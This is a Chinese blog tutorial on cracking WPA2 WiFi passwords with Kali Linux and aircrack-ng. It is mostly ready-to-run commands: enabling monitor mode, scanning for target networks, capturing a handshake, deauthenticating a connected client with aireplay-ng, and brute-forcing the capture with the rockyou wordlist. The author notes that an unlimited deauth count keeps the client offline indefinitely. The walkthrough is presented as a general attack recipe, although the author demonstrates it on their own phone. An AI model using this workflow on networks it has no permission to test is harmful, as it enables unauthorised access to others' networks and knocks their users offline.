kali linux通过aircrack-ng命令破解wifi密码

相关阅读:如何破解攻击WiFi

百度安全验证icon-default.png?t=N7T8https://baijiahao.baidu.com/s?id=1764248756021219497&wfr=spider&for=pc上面2篇文章写得都很不错

一、前期准备工作

1、将无线网卡挂载到Kali上

​ 将无线网卡插到电脑上,如果弹出检测到新的USB设备,就将此设备连接到虚拟机。然后点击虚拟机--->可移动设备--->选择自己的网卡--->连接

image-20220513162708667

可能出现的问题:在可移动设备处无法连接无线网卡;解决:在虚拟机设置中将usb控制器设置成如图所示。注意要先关闭虚拟机在设置。

image-20220513144527731

2、查看是否挂载成功

​ 使用ifconfig命令查看是否存在wlan0网卡,如果不现在可能是未挂载成功或者wlan0网卡不是激活状态

# 显示up状态(激活状态)的网卡信息
ifconfig
# 显示所有网卡的信息,包含未up的
ifconfig -a
# 激活wlan0
sudo ifconfig wlan0 10.0.0.100 up

image-20220513143707563

3、查看网卡是否支持监听模式
# 使用su切换root,后面操作基本都需要root权限
su
# 使用airmon-ng查看,如果PYH一栏为null,表示不支持监听模式
airmon-ng

# 如果不支持监听模式请更换无线网卡,或者使用监听驱动 
# 参考 https://www.cnblogs.com/answerThe/p/12488477.html ,https://github.com/aircrack-ng?tab=repositories

image-20220513144120181

4、检查文件监听影响并杀死影响
# 检查影响
airmon-ng check
# 杀死影响
airmon-ng check kill 

image-20220513144853796

二、网卡监听抓包操作

5、开启无线网卡监听模式
# 开启无线监听,wlan0网卡就是刚刚上面使用ifconfig看到的网卡,开启监听模式后,无线网卡接口wlan0变动为wlan0mon, 能够输入ifconfig进行查看
airmon-ng start wlan0

image-20220513150442797

6、监听周边的WIFI
# 查看周边wifi,注意此时的网卡是wlan0mon,记录需要攻击的目标的BSSID和CH
airodump-ng wlan0mon

image-20220513151758327

7、开始抓包监听
### 抓包命令,请注意此抓包的shell窗口不要关闭
# 注意此处的shell窗口如果关闭过,抓的包的存储名称会有变化,后面解包时要注意,进入wifitest目录查看.cap的包
# 命令格式:airodump-ng --bssid BSSID -c 信道频率 -w 抓包存储的路径 wlan0monbssid就是要抓取包的mac地址,信道频率 是CH,)

mkdir wifitest
airodump-ng --bssid A4:39:B3:15:B5:9E -c 3 -w ./wifitest/ wlan0mon

# BSSID: 无线 AP 的硬件地址
# PWR: 信号强度,值是负数,绝对值越小表示信号越强
# CH: 无线网络信道
# ENC: 加密方式,我们要破解的是 WPA2
# ESSID: 无线网络的名称
# BSSID: 无线 AP 的硬件地址
# STATION: 用户设备的硬件地址

image-20220513152916961

8、强制下线重连

实战中以信号最强的为例(PWD为信号强度,越小信号越强),这里我强制我的手机下线重连(mac地址为---> A4:4B:D5:AC:41:7C)

# 新建一个shell窗口进行攻击
aireplay-ng -0 10 -a A4:39:B3:15:B5:9E -c A4:4B:D5:AC:41:7C wlan0mon

# -0 冲突攻击模式,用于使客户端断开与路由器的连接
# 10 为攻击的次数,如果一直跑不出来可以把线程设置大一点。设置为0会无限攻击,导致客户端一直无法连接路由器,请谨慎使用
# -a 路由器mac地址  -c 客户端mac地址
9、成功抓包及原理讲述

​ 握手包抓取原理:当客户端与路由器建立链接进行通信时,会发送包含hash算法加密的密码数据包,也就是握手包。通过软件捕获此数据包,就完成了抓包。如果在抓包期间没有客户端连接路由器的过程,那就不会有握手包的发送,也就无法抓取握手包了,只能期待有新客户端连接路由器,或者原有客户端掉线后重新连接。除了漫长的等待我们还有一种方法,使用aircrack-ng套件的另一个工具aireplay-ng,它可以强制用户掉线并自动连接路由器,这样就有机会抓到握手包了(如果线程设置大的话,就会导致用户一直连不上网)。在airodump-ng抓包过程中,只要有设备连接到路由器,在station栏中找到它们的mac地址,此时重新打开一个终端,输入命令强制用户掉线重连,直至抓包监听的shell窗口出现WPA handshake即表示抓包成功。

image-20220513154530794

三、字典爆破解密

10、结束监听
# 抓包完成后就可以结束监听了,抓的包存储在wifitest目录下,进目录查看是否只有一个.cap的包,如果有多个,可能就是前面抓包时关闭过shell窗口,导致抓取了多个包,需要确定带有密码的包是哪一个,或者都进行爆破

# 在抓包的shell窗口先ctrl+c,再输入下面命令结束监听
airmon-ng stop wlan0mon

image-20220513160051602

11、字典爆破解密
# 先将Kali自带的字典解压,这是1个一千四百多万的大字典,爆破完估计得几天
gzip -d /usr/share/wordlists/rockyou.txt.gz
# 解密  -W 字典路径
aircrack-ng -w /usr/share/wordlists/rockyou.txt ./wifitest/-01.cap

接下来就是漫长的等待,也有可能解密不成功,这就是字典的问题,字典越大,越容易成功,也可在网上下载其他字典

image-20220513160657004

image-20220513162154788

# 这里为了演示效果,就使用自己新建的一个字典解密,我的密码是wang12345,kali那个字典里没有。。。
aircrack-ng ./wifitest/-01.cap -w ./pass.txt

image-20220513161647344

  • 20
    点赞
  • 26
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

戴国进

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值